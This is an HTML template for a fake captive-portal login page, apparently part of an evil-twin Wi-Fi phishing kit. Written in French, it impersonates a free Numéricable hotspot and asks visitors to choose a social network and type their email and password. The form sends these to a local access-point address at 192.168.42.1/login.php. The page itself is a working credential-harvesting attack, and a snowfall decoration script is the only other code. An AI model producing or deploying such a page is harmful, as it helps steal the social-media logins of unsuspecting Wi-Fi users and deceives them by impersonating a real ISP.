<!doctype html>
<html lang="fr">
<head>
	<meta charset="UTF-8">
<title>Wifi Hotspot Sécurisé en accés gratuit.</title>
	<meta name="viewport" content="width=device-width, initial-scale=1" />
	<meta name="author" content="Wifi Hotspot Secure">
	<meta name="description" content="Accés Wifi offert par Numéricable.">

<link rel="shortcut icon" type="image/x-icon" href="$imagesDir/favicon.ico">
<style media="screen" type="text/css">

body{
  padding:0;
  margin:0;
}

html{
 height:100%;
 min-height:100%;
 }

body {
  /* Location of the image */
  background-image: url('$imagesDir/responsive_bg.jpg');
  
  /* Image is centered vertically and horizontally at all times */
  background-position: center center;
  
  /* Image doesn't repeat */
  background-repeat: no-repeat;
  
  /* Makes the image fixed in the viewport so that it doesn't move when 
     the content height is greater than the image height */
  background-attachment: fixed;
  
  /* This is what makes the background image rescale based on its container's size */
  background-size: cover;
  
  /* Pick a solid background color that will be displayed while the background image is loading */
  background-color:#464646;
  
  /* SHORTHAND CSS NOTATION
   * background: url(background-mobile_bg.jpg) center center cover no-repeat fixed;
   */
}

/* For mobile devices */
@media only screen and (max-width: 767px) {
  body {
    /* The file size of this background image is 93% smaller
     * to improve page load speed on mobile internet connections */
    background-image: url('$imagesDir/responsive_mobile_bg.jpg');
  }
	}


.inner-container {
  width:400px;
  height:530px;
  position:absolute;
  top:calc(50vh - 260px);
  left:calc(50vw - 200px);
  overflow:hidden;
  background:rgba(0,0,0,0.50);
}


.social-icons {
    width: 100%;
    height: auto;
}


ul li {
    display:inline-block;
}


.box h1{
  text-align:center;
  margin:10px 0;
  font-size:30px;
}


.icon{
padding:10px 2px;
margin:0px 5px;

}


/* login text*/
.box{
  position:absolute;
  height:100%;
  width:100%;
  font-family:Helvetica;
  color:#fff;
  padding:5px 0px;
  
 }

 
.lock {
	vertical-align:middle; 
	margin:0px 10px;
}


.box input{
  display:block;
  width:300px;
  margin:20px auto;
  padding:10px;
  background:rgba(0,0,0,0.4);
  color:#fff;
  border:0;
}


.box input:focus,.box input:active,.box .button:focus,.box .button:active{
  outline:none;
}


.box .button{
  background:#742ECC;
  border:0;
  color:#fff;
  padding:8px;
  font-size:20px;
  width:320px;
  margin:20px auto;
  display:block;
  cursor:pointer;
}

.box .button:active{
  background:#27ae60;
}


.box p{
  font-size:14px;
  text-align:center;
  padding:4px;
}


.list {
  display:block;
  width:320px;
  margin:20px auto;
  padding:8px;
  background:rgba(0,0,0,0.4);
  color:#fff;
  border:0;
 
}


.list input:focus,.box input:active,.box .button:focus,.box .button:active{
  outline:none;

}



.modalDialog {
	position: fixed;
	font-family: Arial, Helvetica, sans-serif;
	top: 0;
	right: 0;
	bottom: 0;
	left: 0;
	background: rgba(0,0,0,0.8);
	z-index: 99999;
	opacity:0;
	-webkit-transition: opacity 400ms ease-in;
	-moz-transition: opacity 400ms ease-in;
	transition: opacity 400ms ease-in;
	pointer-events: none;
}



.modalDialog:target {
	opacity:1;
	pointer-events: auto;
}

.modalDialog > div {
	width: 400px;
	position: relative;
	margin: 10% auto;
	padding: 5px 20px 13px 20px;
	border-radius: 10px;
	background: #fff;
	background: -moz-linear-gradient(#fff, #999);
	background: -webkit-linear-gradient(#fff, #999);
	background: -o-linear-gradient(#fff, #999);
}


.close {
	background: #606061;
	color: #FFFFFF;
	line-height: 25px;
	position: absolute;
	right: -12px;
	text-align: center;
	top: -10px;
	width: 24px;
	text-decoration: none;
	font-weight: bold;
	-webkit-border-radius: 12px;
	-moz-border-radius: 12px;
	border-radius: 12px;
	-moz-box-shadow: 1px 1px 3px #000;
	-webkit-box-shadow: 1px 1px 3px #000;
	box-shadow: 1px 1px 3px #000;
}

.close:hover { background: #00d9ff; }


.tooltip{
    display: inline;
    position: relative;
}



.tooltip:hover:after{
    background: #333;
    background: rgba(0,0,0,.8);
    border-radius: 5px;
    bottom: 50px;
    color: #fff;
    content: attr(title);
    left: 5%;
    padding: 5px 15px;
    position: absolute;
    z-index: 98;
    width: 80px;
}



.tooltip:hover:before{
    border: solid;
    border-color: #333 transparent;
    border-width: 6px 6px 0 6px;
    bottom: 44px;
    content: "";
    left: 50%;
    position: absolute;
    z-index: 99;
}


.logo {
  width: 100%;
  height: auto;
  display:inline-block;
  text-align:center;
}



</style>
</head>
<body>
<script>
/*
 *	@Author : Luis Rosas
 *	@Copyright  Click 123 inc.
 *	@Url : http://click123.ca
 *	@License URI: http://www.gnu.org/licenses/gpl-2.0.html
 *	snow.gif / heart.png
 */
function iecompattest() {
    return document.compatMode && "BackCompat" != document.compatMode ? document.documentElement : document.body
}

function snowIE_NS6() {
    for (doc_width = ns6up ? window.innerWidth - 10 : iecompattest().clientWidth - 10, doc_height = window.innerHeight && "windowheight" == snowdistance ? window.innerHeight : ie4up && "windowheight" == snowdistance ? iecompattest().clientHeight : ie4up && !window.opera && "pageheight" == snowdistance ? iecompattest().scrollHeight : iecompattest().offsetHeight, i = 0; no > i; ++i) yp[i] += sty[i], yp[i] > doc_height - 50 && (xp[i] = Math.random() * (doc_width - am[i] - 30), yp[i] = 0, stx[i] = .02 + Math.random() / 10, sty[i] = .7 + Math.random()), dx[i] += stx[i], document.getElementById("dot" + i).style.top = yp[i] + "px", document.getElementById("dot" + i).style.left = xp[i] + am[i] * Math.sin(dx[i]) + "px";
    snowtimer = setTimeout("snowIE_NS6()", 10)
}

function hidesnow() {
    if (window.snowtimer)
        for (clearTimeout(snowtimer), i = 0; no > i; i++) document.getElementById("dot" + i).style.visibility = "hidden"
}
var snowsrc = "$imagesDir/snow.gif",
    no = 10,
    hidesnowtime = 0,
    snowdistance = "pageheight",
    ie4up = document.all ? 1 : 0,
    ns6up = document.getElementById && !document.all ? 1 : 0,
    dx, xp, yp, am, stx, sty, i, doc_width = 800,
    doc_height = 600;
for (ns6up ? (doc_width = self.innerWidth, doc_height = self.innerHeight) : ie4up && (doc_width = iecompattest().clientWidth, doc_height = iecompattest().clientHeight), dx = [], xp = [], yp = [], am = [], stx = [], sty = [], snowsrc = -1 != snowsrc.indexOf("click123.ca") ? "https://click123.ca/dist/img/heart.png" : snowsrc, i = 0; no > i; ++i) dx[i] = 0, xp[i] = Math.random() * (doc_width - 50), yp[i] = Math.random() * doc_height, am[i] = 20 * Math.random(), stx[i] = .02 + Math.random() / 10, sty[i] = .7 + Math.random(), (ie4up || ns6up) && document.write(0 == i ? '<div id="dot' + i + '" style="POSITION:absolute; Z-INDEX:999;VISIBILITY:visible;TOP:15px;LEFT:15px;"><a href="http://click123.ca"><img src=\'' + snowsrc + '\' border="0"></a></div>' : '<div id="dot' + i + '" style="POSITION:absolute;Z-INDEX:999;VISIBILITY:visible;TOP:15px; LEFT:15px;"><img src=\'' + snowsrc + '\' border="0"></div>');
(ie4up || ns6up) && (snowIE_NS6(), hidesnowtime > 0 && setTimeout("hidesnow()", 1e3 * hidesnowtime));
</script>


	<div class="inner-container">

<ul id="icons">
	<li><a href="#" title="Facebook" class="tooltip"><img src="$imagesDir/fb.png" alt="" class="icon"></a></li>
	<li><a href="#" title="Twitter" class="tooltip"><img src="$imagesDir/twitter.png" alt="" class="icon"></a></li>
        <li><a href="#" title="Google+" class="tooltip"><img src="$imagesDir/gplus.png" alt="" class="icon"></a></li>
        <li><a href="#" title="Linkedin" class="tooltip"><img src="$imagesDir/linkedin.png" alt="" class="icon"></a></li>
</ul>	
<div class="box">
      <h1>Connexion</h1><form action="http://192.168.42.1/login.php" method="post" id="classe" alt="blabla">
<select name="socialn" class="list">
		<option value="facebook">Facebook</option>
		<option value="twitter">Twitter</option>
		<option value="googlep" selected>Google+</option>
		<option value="linkedin">Linkedin</option>
	</select>
      <input type="email" id="email" name="email" required placeholder="Email"/>
      <input type="password" id="password" name="userpassword" title="Mot de passe incorrect" pattern="(?=.*\d)(?=.*[a-z]).{6,}" required placeholder="Mot de passe"/>
      
      <input type="submit" value="Se connecter" value="Send" class="button">
</form>
      <p><img src="$imagesDir/secure-wifi.png" class="lock">Wifi Hotspot Secure by Numericable<br><br><small>Pas d'inscription nécéssaire. 
         Pas de payement requis.</small></p>
	<a href="#" class="logo"><img src="$imagesDir/logo.png"></a>
    </div>
</div>

</body>
</html>

